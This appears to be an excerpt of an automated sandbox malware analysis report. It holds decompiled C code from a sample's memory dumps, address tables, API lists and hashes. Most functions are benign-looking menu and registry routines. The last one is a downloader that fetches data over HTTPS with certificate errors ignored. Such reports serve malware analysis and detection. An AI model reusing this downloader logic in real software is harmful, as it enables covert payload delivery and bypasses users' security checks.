                                                                                                                                                                                                                                                                                          										_t101 = _v560;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L30;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					L30:
                                                                                                                                                                                                                                                                                          					DeleteMenu( *(_t131 + 0x10), _v552 + _t101, 0x400);
                                                                                                                                                                                                                                                                                          					return E001059E6(1, _t101, _v8 ^ _t132, _t122, _t129, _t131);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					return E001059E6(_t63, _t100, _v8 ^ _t132, __edx, _t128, __esi);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
































                                                                                                                                                                                                                                                                                          0x000fd690
                                                                                                                                                                                                                                                                                          0x000fd699
                                                                                                                                                                                                                                                                                          0x000fd6a0
                                                                                                                                                                                                                                                                                          0x000fd6a3
                                                                                                                                                                                                                                                                                          0x000fd6aa
                                                                                                                                                                                                                                                                                          0x000fd6bd
                                                                                                                                                                                                                                                                                          0x000fd6c3
                                                                                                                                                                                                                                                                                          0x000fd6c5
                                                                                                                                                                                                                                                                                          0x000fd6cb
                                                                                                                                                                                                                                                                                          0x000fd6d3
                                                                                                                                                                                                                                                                                          0x000fd6e0
                                                                                                                                                                                                                                                                                          0x000fd6eb
                                                                                                                                                                                                                                                                                          0x000fd6fe
                                                                                                                                                                                                                                                                                          0x000fd708
                                                                                                                                                                                                                                                                                          0x000fd70d
                                                                                                                                                                                                                                                                                          0x000fd717
                                                                                                                                                                                                                                                                                          0x000fd729
                                                                                                                                                                                                                                                                                          0x000fd744
                                                                                                                                                                                                                                                                                          0x000fd744
                                                                                                                                                                                                                                                                                          0x000fd72b
                                                                                                                                                                                                                                                                                          0x000fd72b
                                                                                                                                                                                                                                                                                          0x000fd734
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd734
                                                                                                                                                                                                                                                                                          0x000fd75c
                                                                                                                                                                                                                                                                                          0x000fd766
                                                                                                                                                                                                                                                                                          0x000fd772
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd774
                                                                                                                                                                                                                                                                                          0x000fd774
                                                                                                                                                                                                                                                                                          0x000fd775
                                                                                                                                                                                                                                                                                          0x000fd781
                                                                                                                                                                                                                                                                                          0x000fd781
                                                                                                                                                                                                                                                                                          0x000fd78a
                                                                                                                                                                                                                                                                                          0x000fd793
                                                                                                                                                                                                                                                                                          0x000fd795
                                                                                                                                                                                                                                                                                          0x000fd79b
                                                                                                                                                                                                                                                                                          0x000fd7a4
                                                                                                                                                                                                                                                                                          0x000fd7a4
                                                                                                                                                                                                                                                                                          0x000fd7ad
                                                                                                                                                                                                                                                                                          0x000fd7b4
                                                                                                                                                                                                                                                                                          0x000fd795
                                                                                                                                                                                                                                                                                          0x000fd7c6
                                                                                                                                                                                                                                                                                          0x000fd7cd
                                                                                                                                                                                                                                                                                          0x000fd7d2
                                                                                                                                                                                                                                                                                          0x000fd7d5
                                                                                                                                                                                                                                                                                          0x000fd7d8
                                                                                                                                                                                                                                                                                          0x000fd7e0
                                                                                                                                                                                                                                                                                          0x000fd918
                                                                                                                                                                                                                                                                                          0x000fd92b
                                                                                                                                                                                                                                                                                          0x000fd931
                                                                                                                                                                                                                                                                                          0x000fd93c
                                                                                                                                                                                                                                                                                          0x000fd942
                                                                                                                                                                                                                                                                                          0x000fd7e6
                                                                                                                                                                                                                                                                                          0x000fd7ee
                                                                                                                                                                                                                                                                                          0x000fd7ee
                                                                                                                                                                                                                                                                                          0x000fd7f1
                                                                                                                                                                                                                                                                                          0x000fd7fb
                                                                                                                                                                                                                                                                                          0x000fd800
                                                                                                                                                                                                                                                                                          0x000fd806
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd816
                                                                                                                                                                                                                                                                                          0x000fd81d
                                                                                                                                                                                                                                                                                          0x000fd859
                                                                                                                                                                                                                                                                                          0x000fd860
                                                                                                                                                                                                                                                                                          0x000fd865
                                                                                                                                                                                                                                                                                          0x000fd86b
                                                                                                                                                                                                                                                                                          0x000fd870
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd87f
                                                                                                                                                                                                                                                                                          0x000fd891
                                                                                                                                                                                                                                                                                          0x000fd89c
                                                                                                                                                                                                                                                                                          0x000fd8a9
                                                                                                                                                                                                                                                                                          0x000fd8ae
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd8ae
                                                                                                                                                                                                                                                                                          0x000fd81f
                                                                                                                                                                                                                                                                                          0x000fd821
                                                                                                                                                                                                                                                                                          0x000fd907
                                                                                                                                                                                                                                                                                          0x000fd912
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd830
                                                                                                                                                                                                                                                                                          0x000fd834
                                                                                                                                                                                                                                                                                          0x000fd841
                                                                                                                                                                                                                                                                                          0x000fd846
                                                                                                                                                                                                                                                                                          0x000fd8b1
                                                                                                                                                                                                                                                                                          0x000fd8be
                                                                                                                                                                                                                                                                                          0x000fd8c5
                                                                                                                                                                                                                                                                                          0x000fd8d3
                                                                                                                                                                                                                                                                                          0x000fd8df
                                                                                                                                                                                                                                                                                          0x000fd8e5
                                                                                                                                                                                                                                                                                          0x000fd8e6
                                                                                                                                                                                                                                                                                          0x000fd8ec
                                                                                                                                                                                                                                                                                          0x000fd8ed
                                                                                                                                                                                                                                                                                          0x000fd8f9
                                                                                                                                                                                                                                                                                          0x000fd810
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd8ff
                                                                                                                                                                                                                                                                                          0x000fd8ff
                                                                                                                                                                                                                                                                                          0x000fd8ff
                                                                                                                                                                                                                                                                                          0x000fd8f9
                                                                                                                                                                                                                                                                                          0x000fd821
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fd81d
                                                                                                                                                                                                                                                                                          0x000fd816
                                                                                                                                                                                                                                                                                          0x000fd94c
                                                                                                                                                                                                                                                                                          0x000fd95e
                                                                                                                                                                                                                                                                                          0x000fd978
                                                                                                                                                                                                                                                                                          0x000fd6ae
                                                                                                                                                                                                                                                                                          0x000fd6bb
                                                                                                                                                                                                                                                                                          0x000fd6bb

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Menu_memset$Item$CountDeleteInfoVersion
                                                                                                                                                                                                                                                                                          • String ID: &%i %s$,$Z
                                                                                                                                                                                                                                                                                          • API String ID: 3323053169-3841232442
                                                                                                                                                                                                                                                                                          • Opcode ID: 6451ade2f9e8f0d3d359223cb0c2c1370ea5a4bdae43ad76f27c52d8da3aff2e
                                                                                                                                                                                                                                                                                          • Instruction ID: 3cea41bb2228b3828b9c6af17dd93d91e5ef0a5814701635ba1f35341013ff5c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6451ade2f9e8f0d3d359223cb0c2c1370ea5a4bdae43ad76f27c52d8da3aff2e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E71B270A0030DABDB24DF64DC89FEAB3B9FB48704F104999E64997681D7B0AA85DF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                                                                                                                          			E000FB730(void* __ecx, void* __edx, void* __edi) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				short _v11;
                                                                                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v15;
                                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v19;
                                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                                          				char _v279;
                                                                                                                                                                                                                                                                                          				char _v280;
                                                                                                                                                                                                                                                                                          				int _v284;
                                                                                                                                                                                                                                                                                          				int _v288;
                                                                                                                                                                                                                                                                                          				int _v292;
                                                                                                                                                                                                                                                                                          				char _v296;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t43;
                                                                                                                                                                                                                                                                                          				int _t66;
                                                                                                                                                                                                                                                                                          				void* _t70;
                                                                                                                                                                                                                                                                                          				void* _t75;
                                                                                                                                                                                                                                                                                          				void* _t79;
                                                                                                                                                                                                                                                                                          				void* _t80;
                                                                                                                                                                                                                                                                                          				void* _t82;
                                                                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                                                                                                          				void* _t102;
                                                                                                                                                                                                                                                                                          				void* _t103;
                                                                                                                                                                                                                                                                                          				void* _t104;
                                                                                                                                                                                                                                                                                          				intOrPtr _t106;
                                                                                                                                                                                                                                                                                          				void* _t108;
                                                                                                                                                                                                                                                                                          				void* _t109;
                                                                                                                                                                                                                                                                                          				signed int _t110;
                                                                                                                                                                                                                                                                                          				void* _t111;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t100 = __edi;
                                                                                                                                                                                                                                                                                          				_t96 = __edx;
                                                                                                                                                                                                                                                                                          				_t43 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t43 ^ _t110;
                                                                                                                                                                                                                                                                                          				_t79 = __ecx;
                                                                                                                                                                                                                                                                                          				_v292 = 0;
                                                                                                                                                                                                                                                                                          				_v288 = 0;
                                                                                                                                                                                                                                                                                          				_v284 = 0;
                                                                                                                                                                                                                                                                                          				_v20 = 0;
                                                                                                                                                                                                                                                                                          				_v16 = 0;
                                                                                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                                                                                          				if(E000F17B0("Software\\Microsoft\\WTL Samples\\MTPad", 0x80000001,  &_v292) == 0) {
                                                                                                                                                                                                                                                                                          					_push(__edi);
                                                                                                                                                                                                                                                                                          					_t101 = _v292;
                                                                                                                                                                                                                                                                                          					if(E000F17B0("Recent Document List", _t101,  &_v20) == 0) {
                                                                                                                                                                                                                                                                                          						_t97 =  *(__ecx + 0xc);
                                                                                                                                                                                                                                                                                          						_t102 = _v20;
                                                                                                                                                                                                                                                                                          						_v296 =  *(__ecx + 0xc);
                                                                                                                                                                                                                                                                                          						RegSetValueExA(_t102, "DocumentCount", 0, 4,  &_v296, 4);
                                                                                                                                                                                                                                                                                          						_t106 =  *((intOrPtr*)(_t79 + 4));
                                                                                                                                                                                                                                                                                          						while(_t106 > 0) {
                                                                                                                                                                                                                                                                                          							_v20 = 0;
                                                                                                                                                                                                                                                                                          							_v19 = 0;
                                                                                                                                                                                                                                                                                          							_v15 = 0;
                                                                                                                                                                                                                                                                                          							_v11 = 0;
                                                                                                                                                                                                                                                                                          							E000F4980( &_v20, "Document%i", _t106);
                                                                                                                                                                                                                                                                                          							_v280 = 0;
                                                                                                                                                                                                                                                                                          							E00106820( &_v279, 0, 0x103);
                                                                                                                                                                                                                                                                                          							_t111 = _t111 + 0x14;
                                                                                                                                                                                                                                                                                          							E000FB3E0(_t79, _t102, _t106 + 0xe10f,  &_v280);
                                                                                                                                                                                                                                                                                          							_t66 = lstrlenA( &_v280);
                                                                                                                                                                                                                                                                                          							_t97 =  &_v280;
                                                                                                                                                                                                                                                                                          							RegSetValueExA(_t102,  &_v20, 0, 1,  &_v280, _t66 + 1);
                                                                                                                                                                                                                                                                                          							_t106 = _t106 - 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t108 =  *((intOrPtr*)(_t79 + 4)) + 1;
                                                                                                                                                                                                                                                                                          						while(_t108 < 0x10) {
                                                                                                                                                                                                                                                                                          							_t97 =  &_v20;
                                                                                                                                                                                                                                                                                          							_v20 = 0;
                                                                                                                                                                                                                                                                                          							_v19 = 0;
                                                                                                                                                                                                                                                                                          							_v15 = 0;
                                                                                                                                                                                                                                                                                          							_v11 = 0;
                                                                                                                                                                                                                                                                                          							E000F4980( &_v20, "Document%i", _t108);
                                                                                                                                                                                                                                                                                          							_t111 = _t111 + 8;
                                                                                                                                                                                                                                                                                          							RegDeleteValueA(_t102,  &_v20);
                                                                                                                                                                                                                                                                                          							_t108 = _t108 + 1;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t109 = RegCloseKey;
                                                                                                                                                                                                                                                                                          						if(_t102 != 0) {
                                                                                                                                                                                                                                                                                          							RegCloseKey(_t102);
                                                                                                                                                                                                                                                                                          							_t102 = 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_t80 = _v292;
                                                                                                                                                                                                                                                                                          						if(_t80 != 0) {
                                                                                                                                                                                                                                                                                          							RegCloseKey(_t80);
                                                                                                                                                                                                                                                                                          							_v292 = 0;
                                                                                                                                                                                                                                                                                          							_t80 = _v292;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(_t102 != 0) {
                                                                                                                                                                                                                                                                                          							RegCloseKey(_t102);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(_t80 != 0) {
                                                                                                                                                                                                                                                                                          							RegCloseKey(_t80);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_pop(_t103);
                                                                                                                                                                                                                                                                                          						return E001059E6(1, _t80, _v8 ^ _t110, _t97, _t103, _t109);
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t70 = _v20;
                                                                                                                                                                                                                                                                                          						_t82 = RegCloseKey;
                                                                                                                                                                                                                                                                                          						if(_t70 != 0) {
                                                                                                                                                                                                                                                                                          							RegCloseKey(_t70);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						if(_t101 != 0) {
                                                                                                                                                                                                                                                                                          							RegCloseKey(_t101);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						_pop(_t104);
                                                                                                                                                                                                                                                                                          						return E001059E6(0, _t82, _v8 ^ _t110, _t96, _t104, 0);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t75 = _v292;
                                                                                                                                                                                                                                                                                          					if(_t75 != 0) {
                                                                                                                                                                                                                                                                                          						RegCloseKey(_t75);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return E001059E6(0, _t79, _v8 ^ _t110, _t96, _t100, 0);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}



































                                                                                                                                                                                                                                                                                          0x000fb730
                                                                                                                                                                                                                                                                                          0x000fb730
                                                                                                                                                                                                                                                                                          0x000fb739
                                                                                                                                                                                                                                                                                          0x000fb740
                                                                                                                                                                                                                                                                                          0x000fb74d
                                                                                                                                                                                                                                                                                          0x000fb75a
                                                                                                                                                                                                                                                                                          0x000fb760
                                                                                                                                                                                                                                                                                          0x000fb766
                                                                                                                                                                                                                                                                                          0x000fb76c
                                                                                                                                                                                                                                                                                          0x000fb76f
                                                                                                                                                                                                                                                                                          0x000fb772
                                                                                                                                                                                                                                                                                          0x000fb77c
                                                                                                                                                                                                                                                                                          0x000fb7a1
                                                                                                                                                                                                                                                                                          0x000fb7a2
                                                                                                                                                                                                                                                                                          0x000fb7ba
                                                                                                                                                                                                                                                                                          0x000fb7e6
                                                                                                                                                                                                                                                                                          0x000fb7e9
                                                                                                                                                                                                                                                                                          0x000fb7fe
                                                                                                                                                                                                                                                                                          0x000fb804
                                                                                                                                                                                                                                                                                          0x000fb80a
                                                                                                                                                                                                                                                                                          0x000fb80f
                                                                                                                                                                                                                                                                                          0x000fb81c
                                                                                                                                                                                                                                                                                          0x000fb820
                                                                                                                                                                                                                                                                                          0x000fb823
                                                                                                                                                                                                                                                                                          0x000fb826
                                                                                                                                                                                                                                                                                          0x000fb82a
                                                                                                                                                                                                                                                                                          0x000fb83d
                                                                                                                                                                                                                                                                                          0x000fb844
                                                                                                                                                                                                                                                                                          0x000fb849
                                                                                                                                                                                                                                                                                          0x000fb85a
                                                                                                                                                                                                                                                                                          0x000fb866
                                                                                                                                                                                                                                                                                          0x000fb86e
                                                                                                                                                                                                                                                                                          0x000fb87e
                                                                                                                                                                                                                                                                                          0x000fb884
                                                                                                                                                                                                                                                                                          0x000fb885
                                                                                                                                                                                                                                                                                          0x000fb88c
                                                                                                                                                                                                                                                                                          0x000fb890
                                                                                                                                                                                                                                                                                          0x000fb8a0
                                                                                                                                                                                                                                                                                          0x000fb8a3
                                                                                                                                                                                                                                                                                          0x000fb8a7
                                                                                                                                                                                                                                                                                          0x000fb8aa
                                                                                                                                                                                                                                                                                          0x000fb8ad
                                                                                                                                                                                                                                                                                          0x000fb8b1
                                                                                                                                                                                                                                                                                          0x000fb8b6
                                                                                                                                                                                                                                                                                          0x000fb8be
                                                                                                                                                                                                                                                                                          0x000fb8c0
                                                                                                                                                                                                                                                                                          0x000fb8c1
                                                                                                                                                                                                                                                                                          0x000fb8c6
                                                                                                                                                                                                                                                                                          0x000fb8ce
                                                                                                                                                                                                                                                                                          0x000fb8d1
                                                                                                                                                                                                                                                                                          0x000fb8d3
                                                                                                                                                                                                                                                                                          0x000fb8d3
                                                                                                                                                                                                                                                                                          0x000fb8d5
                                                                                                                                                                                                                                                                                          0x000fb8dd
                                                                                                                                                                                                                                                                                          0x000fb8e0
                                                                                                                                                                                                                                                                                          0x000fb8e2
                                                                                                                                                                                                                                                                                          0x000fb8ec
                                                                                                                                                                                                                                                                                          0x000fb8ec
                                                                                                                                                                                                                                                                                          0x000fb8f4
                                                                                                                                                                                                                                                                                          0x000fb8f7
                                                                                                                                                                                                                                                                                          0x000fb8f7
                                                                                                                                                                                                                                                                                          0x000fb8fb
                                                                                                                                                                                                                                                                                          0x000fb8fe
                                                                                                                                                                                                                                                                                          0x000fb8fe
                                                                                                                                                                                                                                                                                          0x000fb903
                                                                                                                                                                                                                                                                                          0x000fb915
                                                                                                                                                                                                                                                                                          0x000fb7bc
                                                                                                                                                                                                                                                                                          0x000fb7bc
                                                                                                                                                                                                                                                                                          0x000fb7bf
                                                                                                                                                                                                                                                                                          0x000fb7c7
                                                                                                                                                                                                                                                                                          0x000fb7ca
                                                                                                                                                                                                                                                                                          0x000fb7ca
                                                                                                                                                                                                                                                                                          0x000fb7ce
                                                                                                                                                                                                                                                                                          0x000fb7d1
                                                                                                                                                                                                                                                                                          0x000fb7d1
                                                                                                                                                                                                                                                                                          0x000fb7d3
                                                                                                                                                                                                                                                                                          0x000fb7e5
                                                                                                                                                                                                                                                                                          0x000fb7e5
                                                                                                                                                                                                                                                                                          0x000fb77e
                                                                                                                                                                                                                                                                                          0x000fb77e
                                                                                                                                                                                                                                                                                          0x000fb786
                                                                                                                                                                                                                                                                                          0x000fb789
                                                                                                                                                                                                                                                                                          0x000fb789
                                                                                                                                                                                                                                                                                          0x000fb7a0
                                                                                                                                                                                                                                                                                          0x000fb7a0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F17B0: RegCloseKey.ADVAPI32(?,?,?,00000000,00000000,00000000,0002001F,00000000,00000000,?), ref: 000F1805
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 000FB789
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(000F88A5,00000000,?,?), ref: 000FB7CA
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,00000000,?,?), ref: 000FB7D1
                                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(000F88A5,DocumentCount,00000000,00000004,?,00000004,00000000,?,?), ref: 000FB804
                                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 000FB844
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FB3E0: lstrlenA.KERNEL32(?,?,?,?,000F86BD,?,?,?,?,?), ref: 000FB406
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 000FB866
                                                                                                                                                                                                                                                                                          • RegSetValueExA.ADVAPI32(000F88A5,00000000,00000000,00000001,00000000,00000001,?,?,?,?,?), ref: 000FB87E
                                                                                                                                                                                                                                                                                          • RegDeleteValueA.ADVAPI32(000F88A5,00000000,?,?), ref: 000FB8BE
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(000F88A5,?,?), ref: 000FB8D1
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 000FB8E0
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(000F88A5,?,?), ref: 000FB8F7
                                                                                                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 000FB8FE
                                                                                                                                                                                                                                                                                            • Part of subcall function 000F4980: wvsprintfA.USER32(?,?,?), ref: 000F498C
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Close$Value$lstrlen$Delete_memsetwvsprintf
                                                                                                                                                                                                                                                                                          • String ID: Document%i$DocumentCount$Recent Document List$Software\Microsoft\WTL Samples\MTPad
                                                                                                                                                                                                                                                                                          • API String ID: 2002973568-1733117880
                                                                                                                                                                                                                                                                                          • Opcode ID: 3890ed143e1a2b6dd4127da740a17b02da047777a2356e3806f01dfbf821cf08
                                                                                                                                                                                                                                                                                          • Instruction ID: 5f997f5a58d4776dc8d7aa6e6df8640d1a233046b8bb18f37efee90f7c7fda07
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3890ed143e1a2b6dd4127da740a17b02da047777a2356e3806f01dfbf821cf08
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27516271E0432C9BDB15DF64DD81BFEB7B9EF48700F00459AEA09A7641DBB09A419FA0
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04002900(char* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                                                                          				void* _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				CHAR* _v28;
                                                                                                                                                                                                                                                                                          				char _v292;
                                                                                                                                                                                                                                                                                          				void _v296;
                                                                                                                                                                                                                                                                                          				void* _v300;
                                                                                                                                                                                                                                                                                          				long _v304;
                                                                                                                                                                                                                                                                                          				long _v308;
                                                                                                                                                                                                                                                                                          				char* _t54;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 != 0 && _a8 != 0 && _a12 != 0) {
                                                                                                                                                                                                                                                                                          					_t54 =  *0x400e004; // 0x400c398
                                                                                                                                                                                                                                                                                          					_v12 = InternetOpenA(_t54, 1, 0, 0, 0);
                                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                                          						_v16 = InternetConnectA(_v12, _a4, 0x1bb, 0x400c3d2, 0x400c3d1, 3, 0, 0);
                                                                                                                                                                                                                                                                                          						if(_v16 != 0) {
                                                                                                                                                                                                                                                                                          							_v20 = HttpOpenRequestA(_v16, "GET", "/", "1.1", 0, 0, 0x80800000, 0);
                                                                                                                                                                                                                                                                                          							if(_v20 != 0) {
                                                                                                                                                                                                                                                                                          								wsprintfA( &_v292, "https://%s", _a4);
                                                                                                                                                                                                                                                                                          								_v28 = "Accept: */*";
                                                                                                                                                                                                                                                                                          								_v24 = 4;
                                                                                                                                                                                                                                                                                          								InternetQueryOptionA(_v20, 0x1f,  &_v296,  &_v24);
                                                                                                                                                                                                                                                                                          								_v296 = _v296 | 0x0000b180;
                                                                                                                                                                                                                                                                                          								InternetSetOptionA(_v20, 0x1f,  &_v296, 4);
                                                                                                                                                                                                                                                                                          								if(HttpSendRequestA(_v20, _v28, lstrlenA(_v28), 0, 0) == 0) {
                                                                                                                                                                                                                                                                                          									_v308 = GetLastError();
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_v300 = 0;
                                                                                                                                                                                                                                                                                          									while(_v300 < _a12) {
                                                                                                                                                                                                                                                                                          										_v304 = 0;
                                                                                                                                                                                                                                                                                          										InternetReadFile(_v20, _a8 + _v300, _a12 - _v300,  &_v304);
                                                                                                                                                                                                                                                                                          										if(_v304 != 0) {
                                                                                                                                                                                                                                                                                          											_v300 = _v300 + _v304;
                                                                                                                                                                                                                                                                                          											 *(_a8 + _v300) = 0;
                                                                                                                                                                                                                                                                                          											continue;
                                                                                                                                                                                                                                                                                          										} else {
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										break;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_v8 = _v300;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								InternetCloseHandle(_v20);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							InternetCloseHandle(_v16);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						InternetCloseHandle(_v12);
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _v8;
                                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                                          0x04002909
                                                                                                                                                                                                                                                                                          0x04002914
                                                                                                                                                                                                                                                                                          0x04002936
                                                                                                                                                                                                                                                                                          0x04002942
                                                                                                                                                                                                                                                                                          0x04002949
                                                                                                                                                                                                                                                                                          0x04002972
                                                                                                                                                                                                                                                                                          0x04002979
                                                                                                                                                                                                                                                                                          0x040029a3
                                                                                                                                                                                                                                                                                          0x040029aa
                                                                                                                                                                                                                                                                                          0x040029c0
                                                                                                                                                                                                                                                                                          0x040029c9
                                                                                                                                                                                                                                                                                          0x040029d0
                                                                                                                                                                                                                                                                                          0x040029e8
                                                                                                                                                                                                                                                                                          0x040029f9
                                                                                                                                                                                                                                                                                          0x04002a0e
                                                                                                                                                                                                                                                                                          0x04002a33
                                                                                                                                                                                                                                                                                          0x04002ab5
                                                                                                                                                                                                                                                                                          0x04002a35
